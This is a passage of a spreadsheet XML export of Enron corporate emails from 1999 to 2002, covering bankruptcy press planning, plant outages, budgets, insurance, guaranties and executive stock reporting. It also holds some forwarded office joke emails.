(most are completely inappropriate - I have sick friends).  Check out _x000D_
www.darwinawards.com for some funny but true stories.  I'll talk to you later._x000D_
_x000D_
Ted_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 25 Nov 2001 16:39:44 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mbuckley@brunswickgroup.com'})</t>
  </si>
  <si>
    <t>RE: Press Release - Enron Announces Progress</t>
  </si>
  <si>
    <t>Thanks Steve. _x000D_
_x000D_
We're working on slightly updating the "Plan C" document you sent earlier -- it will be reworded to reflect an "intention to reorganize" - just in case we need to announce prior to actual filing._x000D_
_x000D_
Other than that, we're on hold. _x000D_
_x000D_
-----Original Message----- _x000D_
From: Kean, Steven J. [&lt;mailto:steve.kean@enron.com&gt;] _x000D_
Sent: 25 November 2001 19:10 _x000D_
To: Michael Buckley _x000D_
Subject: FW: Press Release - Enron Announces Progress _x000D_
_x000D_
_x000D_
_x000D_
This is the release we issued last week as an update.  I will also _x000D_
forward the release we asked Dynegy to issue (they didn't) containing a _x000D_
recommitment to the merger. _x000D_
&gt;  -----Original Message----- _x000D_
&gt; From:         Radford, Pat  _x000D_
&gt; Sent: Wednesday, November 21, 2001 11:01 AM _x000D_
&gt; Subject:      Press Release - Enron Announces Progress _x000D_
&gt; _x000D_
&gt;  &lt;&lt;112101 PressRelease-LTR.pdf&gt;&gt; _x000D_
_x000D_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 _x000D_
_x000D_
_x000D_
_x000D_
This email is sent by Brunswick Group Limited, 16 Lincoln's Inn Fields, London, WC2A 3ED (also the registered office). The company is registered in England (No. 2094879)._x000D_
_x000D_
This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you are not the intended recipient, you are hereby notified that any use or dissemination of this communication is strictly prohibited. If you have received this E-mail in error, please notify us immediately, then delete this E-mail. _x000D_
_x000D_
This footnote also confirms that this email message has been swept by MIMEsweeper for the presence of computer viruses.</t>
  </si>
  <si>
    <t>Wed, 27 Jun 2001 09:24:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sheryl_gussett@reliantenergy.com'})</t>
  </si>
  <si>
    <t>RE: Hi</t>
  </si>
  <si>
    <t>Hi _x000D_
Sorry I couldn't get back with you sooner -I was stuck in an EES meeting which lasted until 700 and then it followed me home for several hours only to be awoken at 1130 with news that "only I" had the authority to sign off on the deal and that it had to be done that night.  At 100, I said I'm done see you in the am.  In the darkness of early morning, we continued.  A temporary calm exists;  the tropical depression looms.  Call you when the rain ceases._x000D_
ps Boston was great, thanks_x000D_
 -----Original Message-----_x000D_
From: 	Sheryl_Gussett@reliantenergy.com@ENRON [mailto:IMCEANOTES-Sheryl+5FGussett+40reliantenergy+2Ecom+40ENRON@ENRON.com] _x000D_
Sent:	Tuesday, June 26, 2001 2:59 PM_x000D_
To:	Sager, Elizabeth_x000D_
Subject:	Hi_x000D_
_x000D_
How was your trip to Boston?  It was a bit "hot" for Boston this weekend_x000D_
(something like 82 degrees).  Anyway, hope you all had a good time.  I_x000D_
think I need a martini (I have put 2 kittens to sleep in the past two days_x000D_
and 2 others have died in my house in the past 3 days, yuck).  Any chance_x000D_
you can slip out earlish tonight for a drink?  I have my 5 o'clock lawyer_x000D_
call, but might be inclinded to skip it since I also have a 4 o'clock_x000D_
lawyer call on bankruptcy issues._x000D_
_x000D_
Sheryl</t>
  </si>
  <si>
    <t>Mon, 30 Oct 2000 06:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Sally,_x000D_
_x000D_
Per Dorie, there will be an interactive invitation to Office of the Chair _x000D_
offsite (probably the beginning of next week).  With a click, you will RSVP &amp; _x000D_
indicate whether or not you need airline reservations.  If so, you will be _x000D_
forwarded to a travel agent who has been selected to make these _x000D_
reservations.  Do you want me to make back-up reservations just in case _x000D_
preferable flights get booked early?_x000D_
_x000D_
PT_x000D_
---------------------- Forwarded by Patti Thompson/HOU/ECT on 10/31/2000 _x000D_
01:26 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Patti Thompson                           10/30/2000 02:06 PM_x000D_
	_x000D_
_x000D_
To: Dorie Hitchcock/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: 2000 ENA Offsite_x000D_
_x000D_
Dorie,_x000D_
Are you making airline reservations?  I checked with you several weeks ago &amp; _x000D_
you said everyone needed to make their own arrangements - Is this still the _x000D_
case or will you be handling?  If so, please call me so we can make _x000D_
arrangements for Sally Beck._x000D_
_x000D_
Thanks,_x000D_
Patti x39106_x000D_
---------------------- Forwarded by Patti Thompson/HOU/ECT on 10/31/2000 _x000D_
01:03 AM ---------------------------_x000D_
_x000D_
_x000D_
David W Delainey_x000D_
10/30/2000 01:12 PM_x000D_
To: Janet R Dietrich/HOU/ECT@ECT, Kevin M Presto/HOU/ECT@ECT, Tim _x000D_
Belden/HOU/ECT@ECT, Christopher F Calger/PDX/ECT@ECT, Derek _x000D_
Davies/CAL/ECT@ECT, Stephen H Douglas/HOU/ECT@ECT, James D _x000D_
Steffes/NA/Enron@Enron, Hunter S Shively/HOU/ECT@ECT, Laura _x000D_
Luce/Corp/Enron@Enron, Phillip K Allen/HOU/ECT@ECT, Michael L _x000D_
Miller/NA/Enron@Enron, Thomas A Martin/HOU/ECT@ECT, John _x000D_
Zufferli/CAL/ECT@ECT, Scott Tholan/Corp/Enron@Enron, W David _x000D_
Duran/HOU/ECT@ECT, Jeff Donahue/HOU/ECT@ECT, Rob Milnthorp/CAL/ECT@ECT, Max _x000D_
Yzaguirre/NA/Enron@ENRON, C John Thompson/Corp/Enron@ENRON, Scott _x000D_
Josey/Corp/Enron@ENRON, Paul Devries/TOR/ECT@ECT, Scott Neal/HOU/ECT@ECT, _x000D_
Jean Mrha/NA/Enron@Enron, David Oxley/HOU/ECT@ECT, Mark E _x000D_
Haedicke/HOU/ECT@ECT, Joseph Deffner/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, _x000D_
Beth Perlman/HOU/ECT@ECT, Greg Wolfe/HOU/ECT@ECT, John Arnold/HOU/ECT@ECT, _x000D_
Wes Colwell/HOU/ECT@ECT, Fletcher J Sturm/HOU/ECT@ECT, Edward D _x000D_
Baughman/HOU/ECT@ECT, Mike Swerzbin/HOU/ECT@ECT, Bruce _x000D_
Sukaly/Corp/Enron@Enron, Doug Gilbert-Smith/Corp/Enron@ENRON, Eric _x000D_
LeDain/CAL/ECT@ECT, Brian Redmond/HOU/ECT@ECT, Ozzie Pagan/HOU/ECT@ECT, _x000D_
Rogers Herndon/HOU/ECT@ect, Jeffery Ader/HOU/ECT@ECT, Dana Davis/HOU/ECT@ECT, _x000D_
Fred Lagrasta/HOU/ECT@ECT, Jonathan McKay/CAL/ECT@ECT_x000D_
cc: Mark Frevert/NA/Enron@Enron, Kay Chapman/HOU/ECT@ECT, Dorie _x000D_
Hitchcock/HOU/ECT@ECT _x000D_
Subject: 2000 ENA Offsite_x000D_
_x000D_
Guys, attached you will find a preliminary agenda for the 2000 ENA Offsite.  _x000D_
As leaders of the organization, you have been invited to participate in a two _x000D_
day offsite where business 2001 objectives and strategies for ENA will be _x000D_
discussed.  It is scheduled to occur December 14th and 15th at the Venetian _x000D_
in Las Vegas._x000D_
_x000D_
This is the forum to ensure that your point of view and ideas can be heard _x000D_
and incorporated into our plans and iniatives as such I would encourage _x000D_
everyone to attend and to stay for the entire period.  In particular, we _x000D_
would like everyone to stay over Friday night and leave Saturday morning._x000D_
_x000D_
ENA public relations (Dorie) will manage all the logistics including air fare._x000D_
_x000D_
Final invitations, details and agenda will follow shortly._x000D_
_x000D_
_x000D_
_x000D_
Regards_x000D_
Dave and John_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 19 Oct 2000 07:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>HQ Energy Services (U.S.) Inc. Guaranty</t>
  </si>
  <si>
    <t xml:space="preserve"> Attached for your approval is the form of Enron Corp. Guaranty in favor of=_x000D_
=20_x000D_
the referenced Counterparty, which guarantees the obligations of ENA under=_x000D_
=20_x000D_
an  ISDA Master Agreement.  This Counterparty is an affiliate of the utilit=_x000D_
y=20_x000D_
for the Province of Quebec, Hydro-Quebec.  We will need the standard execut=_x000D_
ed=20_x000D_
copy._x000D_
_x000D_
 Per my voicemail, we will need the executed guaranty by Tuesday, October 2=_x000D_
4,=20_x000D_
2000.  Please let me know if this presents any problem._x000D_
_x000D_
 In addition, we will need the following closing documents:  (i) Certificat=_x000D_
e=20_x000D_
of Incumbency, (ii) certified board resolutions of the Policy for Approval =_x000D_
of=20_x000D_
Guarantees (=01&amp;Policy=018), (iii) certificate by the Treasurer or other au=_x000D_
thorized=20_x000D_
officer certifying coverage of the Guaranty under the Policy, and (iv)=20_x000D_
certified copy of Enron Corp.=01,s articles of incorporation and bylaws._x000D_
_x000D_
 Upon approval and execution, please call me at x33399 to pick up the=20_x000D_
documents.  Thank you for your assistance in this matter._x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 Feb 2000 05:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Regulatory/Commercial Advice Needed by PGN/Indonesia</t>
  </si>
  <si>
    <t xml:space="preserve">This e-mail was mistakely sent to the "other" Mark Schroeder in Omaha.  In _x000D_
any event, given our discussion yesterday, do we really want to be jumping _x000D_
through hoops for this Indonesian gas firm.  Jane Wilson did mention to me _x000D_
yesterday that we were pursuing a JV.  Is that off or likely to be put off, _x000D_
given our narrowed focus in Asia/Southeast Asia?   thanks  mcs _x000D_
---------------------- Forwarded by Mark Schroeder/LON/ECT on 09/02/2000 _x000D_
13:45 ---------------------------_x000D_
_x000D_
_x000D_
Mark A Schroeder@ENRON_x000D_
09/02/2000 13:39_x000D_
To: Mark Schroeder/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Regulatory/Commercial Advice Needed by PGN/Indonesia_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Mark A Schroeder/NPNG/Enron on 02/09/2000 _x000D_
07:39 AM ---------------------------_x000D_
_x000D_
_x000D_
David Merrill@ENRON_DEVELOPMENT_x000D_
02/09/2000 07:33 AM_x000D_
To: Robert Neustaedter/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Jane Wilson/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Paul Adair@ECT, _x000D_
Christopher B Hunt/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, J3NG@aol.com, Repit _x000D_
Suliyono/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Marshall Burchard@ECT (bcc: _x000D_
Mark A Schroeder/NPNG/Enron)_x000D_
_x000D_
Subject: Regulatory/Commercial Advice Needed by PGN/Indonesia_x000D_
_x000D_
_x000D_
PGN requires the following soonest:_x000D_
_x000D_
1.   Our comments on their draft Gas Transportation Agreement for _x000D_
     delivery of gas to Singapore.   Draft GTA  being DHLed to you _x000D_
      by our Jakarta office.  They will be supplying some 350MMCF/day_x000D_
      to Singapore by 2002.  They need to finish this document this month._x000D_
      They request us to make suggested changes directly on the_x000D_
      text with comments and explanations shown in the margins._x000D_
_x000D_
2.   Any papers we have summarizing the principles of gas transportaton_x000D_
     agreements -- including cross-border agreements._x000D_
_x000D_
3.  Laws/language on third party access to pipelines from other_x000D_
     countries (along with their pros and cons).  They_x000D_
      need this to help them draft the thrid party access provisions_x000D_
      for the new Oil and Gas law on which comments are due shortly._x000D_
_x000D_
Following is being sent to you by DHL:_x000D_
_x000D_
4   Copies of the training program on regulatory affairs done for PGN by_x000D_
     NERA last May.  [confidential].   This is so you and Jane will know_x000D_
     what PGN already has been taught and not to go over the same ground._x000D_
_x000D_
5.   Copies of the advice on a regulatory regime for gas provided to PGN_x000D_
     by NERA in 1997 (confidential).     _x000D_
_x000D_
_x000D_
DM        _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
    _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Jul 2000 03:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'risk.group@enron.com'})</t>
  </si>
  <si>
    <t>Risk Assessment Meeting Notes</t>
  </si>
  <si>
    <t>Please contact Gia Maisashvili (713-853-4346) or John Neslage (713-853-6827) _x000D_
and let them know which working group you would like to participate in._x000D_
_x000D_
Thanks,_x000D_
Marcia</t>
  </si>
  <si>
    <t>Mon, 15 May 2000 11:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.virgo@enron.com'})</t>
  </si>
  <si>
    <t>Peaker Schedules</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by David W Delainey/HOU/ECT on 05/15/2000 _x000D_
06:24 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Mitch Robinson @ ENRON                           05/15/2000 06:03 PM_x000D_
	_x000D_
_x000D_
To: John Normand/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Gavin Gaul/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Bob _x000D_
Greene/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kevin M Presto/HOU/ECT@ECT, David _x000D_
W Delainey/HOU/ECT@ECT, Mark Dobler/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Larry L Izzo/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
Subject: Peaker Schedules_x000D_
_x000D_
From Mike Miller and Mitch Robinson_x000D_
_x000D_
John -_x000D_
_x000D_
After today's conference call regarding the peakers and after today's failed _x000D_
attempt to commercially dispatch two of the units at the Lincoln facility, we _x000D_
see the following action items that need immediate resolution in order to get _x000D_
the peakers back on schedule:_x000D_
_x000D_
Lincoln:_x000D_
1.  Discussion with GE at sufficiently high level to determine whether any GE _x000D_
units at any sites have ever made &lt;9 ppm NOx with CO &lt;25 ppm (M. Dobler has _x000D_
initiated this discussion with Michelle April of GE)._x000D_
2.  A detailed plan of attack from GE to get the units within guarantee _x000D_
emission limits._x000D_
3.  Resolution of the HMI sluggish response issue complete with a plan of _x000D_
attack.  The units can be run, but are clearly not ready for commercial _x000D_
operation with the sluggish HMI._x000D_
_x000D_
Wheatland:_x000D_
1.  A plan of attack from Westinghouse to correct the fuel valves (and/or _x000D_
nozzles) on units 1 and 2.  Currently, the units can not be run reliably at _x000D_
base load._x000D_
2.  Plan of attack and schedule to correct the vibrations on 1 &amp; 2._x000D_
3.  A response from Westinghouse and PCD to get dedicated TD and controls _x000D_
support (this comment also applies to Gleason); sharing Rutledge and PCD _x000D_
controls personnel is proving inadequate._x000D_
4.  Frequent technical questions for Westinghouse are taking extended time to _x000D_
get answers.  A dedicated EE&amp;CC or NEPCO representative in the Orlando office _x000D_
would help facilitate getting rapid answers (applies to Gleason also)._x000D_
_x000D_
Gleason:_x000D_
1.  A detailed schedule and plan of attack is needed for the compressor blade _x000D_
modifications on units 1&amp;2._x000D_
2.  An on-site EE&amp;CC representative is required to bird-dog the compressor _x000D_
blade seals modification._x000D_
3.  Verification from Westinghouse that the 12 day modification will not slip _x000D_
into 3 weeks is required (see item 1)._x000D_
4.  Verification that the IGV's have been fully corrected is required._x000D_
5.  A response from Westinghouse and PCD to get dedicated TD and controls _x000D_
support (this comment also applies to Wheatland); sharing Rutledge and PCD _x000D_
controls personnel is proving inadequate._x000D_
6.  Frequent technical questions for Westinghouse are taking extended time to _x000D_
get answers.  A dedicated EE&amp;CC or NEPCO representative in the Orlando office _x000D_
would help facilitate getting rapid answers (applies to Wheatland also)._x000D_
_x000D_
Mitch Robinson &amp; Mike Miller_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Jun 2002 06:49:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'l..kelly@enron.com', 'melissa.solis@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve"> I don't see the upward eye roll that all women are so good at.  I can even see my daughter practicing it when I feed her._x000D_
_x000D_
-----Original Message-----_x000D_
From: Solis, Melissa _x000D_
Sent: Monday, June 17, 2002 11:27 AM_x000D_
To: Polsky, Phil; Germany, Chris; Quezada, Daniel; Versen, Victoria; Garza, Maria; Kelly, Katherine L.; Barbe, Robin; 'nsolis@vericenter.com'_x000D_
Subject: FW: _x000D_
_x000D_
_x000D_
 _x000D_
-----Original Message-----_x000D_
From: Tracy Solis [mailto:tracy_solis@hotmail.com]_x000D_
Sent: Monday, June 17, 2002 11:17 AM_x000D_
To: butlerb3@epenergy.com; Solis, Melissa; Butler, Monica; NS995677@MSXSCC.SHELL.COM_x000D_
Subject: _x000D_
_x000D_
_x000D_
Words Women Use..._x000D_
_x000D_
FINE ~ This is the word we use at the end of any argument that we feel we_x000D_
are right about but need to shut you up. NEVER use fine to describe how a_x000D_
woman looks. This will cause you to have one of those arguments._x000D_
_x000D_
FIVE MINUTES ~ This is half an hour. It is equivalent to the five minutes_x000D_
that your football game is going to last before you take out the trash, so_x000D_
I_x000D_
feel that it's an even trade._x000D_
_x000D_
NOTHING ~ If you ask her what is wrong and she says NOTHING, this means_x000D_
something and you should be on your toes. NOTHING is usually used to_x000D_
describe the feeling a woman has of wanting to turn you inside out, upside_x000D_
down, and backwards. "Nothing" usually signifies an argument that will last_x000D_
FIVE MINUTES and end with the word FINE._x000D_
_x000D_
GO AHEAD (with raised eyebrows) ~ This is a dare. One that will result in a_x000D_
woman getting upset over NOTHING and will end with the word FINE._x000D_
GO AHEAD (normal eyebrows) ~ This means "I give up" or "do what you want_x000D_
because I don't care." You will get a raised eyebrow "Go ahead" in just a_x000D_
few minutes, followed by NOTHING and FINE and she will talk to you in about_x000D_
FIVE MINUTES when she cools off._x000D_
_x000D_
LOUD SIGH ~ This is not actually a word, but is still often a verbal_x000D_
statement very misunderstood by men. A "Loud Sigh" means she thinks you are_x000D_
an idiot at that moment and wonders why she is wasting her time standing_x000D_
here and arguing with you over NOTHING._x000D_
_x000D_
SOFT SIGH ~ Again, not a word, but a verbal statement. "Soft Sighs" are one_x000D_
of the few things that some men actually understand. She is content. Your_x000D_
best bet is to not move or breathe and she will stay content._x000D_
_x000D_
THAT'S OKAY ~ This is one of the most dangerous statements that a woman can_x000D_
say to a man. "That's Okay" means that she wants to think long and hard_x000D_
before paying you retributions for whatever it is that you! have done._x000D_
"That's Okay" is often used with the word "Fine" and used in conjunction_x000D_
with a raised eyebrow "Go ahead." At some point in the near future when she_x000D_
has plotted and planned, you are going to be in some mighty big trouble._x000D_
_x000D_
PLEASE DO ~ This is not a statement, it is an offer. A woman is giving you_x000D_
the chance to come up with whatever excuse or reason you have for doing_x000D_
whatever it is that you have done. You have a fair chance to tell the_x000D_
truth,_x000D_
so be careful and you shouldn't get a "That's Okay."_x000D_
_x000D_
THANKS ~ A woman is thanking you. Do not faint; just say "you're welcome."_x000D_
_x000D_
THANKS A LOT ~ This is much different from "Thanks." A woman will say,_x000D_
"Thanks A Lot" when she is really ticked off at you. It signifies that you_x000D_
have hurt her in some callous way, and will be followed by the "Loud Sigh."_x000D_
Be careful not to ask what is wrong after the "Loud Sigh," as she will only_x000D_
tell you "Nothing."_x000D_
_x000D_
Please send this out to ! ALL men that you know just to warn them about_x000D_
future_x000D_
arguments they can avoid if remembering all the terminology._x000D_
_x000D_
And send to all your women friends to get a good laugh!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
  _____  _x000D_
_x000D_
Join the world's largest e-mail service with MSN Hotmail. Click Here &lt;http://g.msn.com/1HM505401/47&gt;_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 10:56:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.pickering@enron.com'})</t>
  </si>
  <si>
    <t>RE: 2002 Budget</t>
  </si>
  <si>
    <t xml:space="preserve">We really are Louise. I hope that Will's numbers tally with ours, they should do._x000D_
_x000D_
Mark Pickering _x000D_
Chief Technology Officer_x000D_
_x000D_
Enron Net Works, LLC_x000D_
_x000D_
  _____  _x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	17 October 2001 12:44_x000D_
To:	Piper, Greg; Pickering, Mark_x000D_
Subject:	FW: 2002 Budget_x000D_
_x000D_
Looks like we are making outstanding progress.  This is great news._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Will, Lloyd  _x000D_
Sent:	Wednesday, October 17, 2001 12:40 PM_x000D_
To:	Belden, Tim; Presto, Kevin M.; Milnthorp, Rob_x000D_
Cc:	Kitchen, Louise_x000D_
Subject:	2002 Budget_x000D_
_x000D_
Attached is a draft spreadsheet that captures the budget items reviewed with IT yesterday._x000D_
_x000D_
I have tried to correlate our description with their project name.  I have also created a starting budget and proposed budget for your review.  A % allocation row for east, west and cdn allocation has also been created for your review and comments._x000D_
_x000D_
The overall IT budget was brought down from 25.4MM to 16.3MM. _x000D_
_x000D_
Please review for any final comments as well as you comments on allocations.  Please note that the largest item was power fundamentals (6.2MM) which has bundled in it remote support, VMS support ect, it is IT's overall catch all accounts that require direct support of delivered  systems._x000D_
 _x000D_
_x000D_
 &lt;&lt; File: budget 2001.xls &gt;&gt; </t>
  </si>
  <si>
    <t>Fri, 2 Feb 2001 06:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">The insurance has been purchased by Enron exclusively to cover our equity and _x000D_
our subd debt through our commercial program (not OPIC).  We  have covered _x000D_
the following investments to date on Cuiaba._x000D_
_x000D_
EPE                 $235MM_x000D_
GASMAT $  60MM_x000D_
GASBOL $132MM_x000D_
_x000D_
Up to US$200MM could be reimbursed for an insuarble event.  However, that _x000D_
$200 may be limited by draws associated with insurable events at other _x000D_
projects.  This $200MM could be further limited by draws from other projects _x000D_
because the program has a cap of $250MM total, but the cap can be reinstated _x000D_
following a draw with an exclusion for the country where the previous hit _x000D_
occurred._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mariella Mahan@ENRON_DEVELOPMENT_x000D_
02/02/2001 11:27 AM_x000D_
To: Rob G Gay/NA/Enron@ENRON_x000D_
cc: Tracee Bersani/HOU/ECT@ECT@ENRON, Peter E Weidler/NA/Enron@Enron, Richard _x000D_
A Lammers/SA/Enron@Enron, Laine A Powell/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Jose Bestard/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John Novak/SA/Enron@Enron, _x000D_
Eddy Daniels/NA/Enron@Enron _x000D_
_x000D_
Subject: Re: Insurance  _x000D_
_x000D_
Rob,_x000D_
Isn't the $200 million the cap of OPIC and doesn't that apply to 100% of the _x000D_
equity covered by OPIC, which means that, I guess (and I don't know if Shelll _x000D_
qualifies or if we structured around this) we share with Shell the $200 _x000D_
million on the basis of equity percentages held by each?_x000D_
Thanks_x000D_
_x000D_
_x000D_
_x000D_
Rob G Gay@ENRON_x000D_
02/02/2001 09:27 AM_x000D_
To: Tracee Bersani/HOU/ECT@ECT_x000D_
cc: Peter E Weidler/NA/Enron@Enron, Richard A Lammers/SA/Enron@Enron, Laine A _x000D_
Powell/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jose _x000D_
Bestard/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John Novak/SA/Enron@Enron, Eddy _x000D_
Daniels/NA/Enron@Enron, Mariella Mahan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Re: Insurance  _x000D_
_x000D_
I believe that is correct._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Tracee Bersani@ECT_x000D_
02/01/2001 05:02 PM_x000D_
To: Rob G Gay/NA/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Insurance  _x000D_
_x000D_
Rob,_x000D_
_x000D_
Didn't he say we were only covered up to $200 MM (e.g. the limit of our _x000D_
contract frustration cover?) With the current Shell/enron sharing _x000D_
percentages, it would seem that we are entitled to 72% of the $360 MM payment _x000D_
or $259 MM, thus we would only be out by $59 MM._x000D_
_x000D_
Tracee_x000D_
_x000D_
_x000D_
_x000D_
Rob G Gay@ENRON_x000D_
02/01/2001 04:57 PM_x000D_
To: Peter E Weidler/NA/Enron@Enron, Richard A Lammers/SA/Enron@Enron, Laine A _x000D_
Powell/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jose _x000D_
Bestard/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John Novak/SA/Enron@Enron, Eddy _x000D_
Daniels/NA/Enron@Enron, Mariella Mahan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Tracee Bersani/HOU/ECT@ECT_x000D_
cc: Cliff Shedd/NA/Enron@Enron _x000D_
Subject: Insurance_x000D_
_x000D_
According to Cliff Shedd, we would be covered by insurance if we terminated _x000D_
the contract with Furnas and Furnas failed to pay the termination payment.  _x000D_
However the insurers will only pay after we receive an arbitration judgement _x000D_
against them and the refuse to honor the judgement.  I assume we would also _x000D_
have to exhaust our remedies against trhe guarantor (Eletrobras)._x000D_
_x000D_
Also, we are required to notify the underwriters immediately of a material _x000D_
default.   _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 13 Dec 1999 06:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bryan.hull@enron.com', "o'neal.winfree@enron.com", 'michael.walters@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: Monica</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Eric Bass/HOU/ECT on 12/13/99 02:34 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Brian Hoskins_x000D_
12/13/99 02:22 PM_x000D_
To: Dick Jenkins/HOU/ECT@ECT, Eric Bass/HOU/ECT@ECT, Roberto _x000D_
Martinez/HOU/ECT@ECT, Matthew Lenhart/HOU/ECT@ECT, Hector Campos/HOU/ECT@ECT, _x000D_
Lenine Jeganathan/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Fwd: Monica_x000D_
_x000D_
---------------------- Forwarded by Brian Hoskins/HOU/ECT on 12/13/99 02:21 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Ophelia Mottu_x000D_
12/13/99 01:47 PM_x000D_
To: Stephanie Gardner/HOU/ECT@ECT, Cecilia Olvera/HOU/ECT@ECT, Javier _x000D_
Espinoza/HOU/ECT@ECT, Kristie Youngblood/HOU/ECT@ECT, rpena@houston.org, _x000D_
rmart@telxon.com, hcarker@rexelusa.com, ntorres@rexelusa.com, _x000D_
etijerin@exchange.ml.com, ktijerina@tmh.tmc.edu, agaytan@aglife.com, _x000D_
Veronica.Mottu@usa.xerox.com, vanessa_hernandez@co.harris.tx.us, _x000D_
dd545022@MSXSSC.shell.com, Brian Hoskins/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Fwd: Cum on Monica_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Ophelia Mottu/HOU/ECT on 12/13/99 01:43 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
griselda echeverria &lt;koko7722@yahoo.com&gt; on 12/13/99 09:10:55 AM_x000D_
To: stacey ornelas &lt;staceyornelas@hotmail.com&gt;, Hiawatha Henry _x000D_
&lt;hiawatham@yahoo.com&gt;, elsa lopez &lt;elsa@genesiseurope.com&gt;, Maria Martinez _x000D_
&lt;mariam@cda.co.harris.tx.us&gt;, Ophelia Mottu/HOU/ECT@ECT_x000D_
cc: Bety Rivera &lt;BBRMORENA@aol.com&gt; _x000D_
Subject: Fwd: Cum on Monica_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;http://www.dirtymind.com/games/word/index.html_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 14:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.mckendree@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'marty.sunde@enron.com', 'harold.buchanan@enron.com', 'janet.dietrich@enron.com', 'michael.brown@enron.com', 'james.hughes@enron.com', 'kevin.hannon@enron.com', 'jeffrey.sherrick@enron.com', 'jeffrey.mcmahon@enron.com', 'thomas.white@enron.com', 'david.delainey@enron.com', 'jeremy.blachman@enron.com', 'louise.kitchen@enron.com', 'steve.elliott@enron.com', 'jeffrey.shankman@enron.com', 'raymond.bowen@enron.com', 'greg.piper@enron.com', 'dan.leff@enron.com', 'david.cox@enron.com', 'mark.muller@enron.com', 'ben.glisan@enron.com', 'mike.mcconnell@enron.com', 'wade.cline@enron.com', 'rod.hayslett@enron.com', 'john.sherriff@enron.com', 'john.lavorato@enron.com', 'philippe.bibi@enron.com', 'jim.fallon@enron.com', 'greg.whalley@enron.com', 'matthew.scrimshaw@enron.com', 'danny.mccarty@enron.com', 'rebecca.mcdonald@enron.com'})</t>
  </si>
  <si>
    <t>Request for 3/31/01 Stock Holdings</t>
  </si>
  <si>
    <t xml:space="preserve">On a quarterly basis the Executive Compensation group provides a report to the Compensation Committee of the Board of Directors which details Executive Committee member stock holdings.  Such holdings include:_x000D_
_x000D_
?	shares held in a family trust,_x000D_
?	your personal brokerage account,_x000D_
?	in certificate for, or_x000D_
?	in an IRA_x000D_
?	any shares held in connection with Company plans (i.e., ESOP, savings plans, phantom shares, option grants, or restricted stock grants), although shares acquired that are held free-and-clear should be included_x000D_
_x000D_
_x000D_
Because of your inclusion in the Executive Committee, we will be requesting this data from you prior to each quarter's report.   Your response in greatly appreciated._x000D_
_x000D_
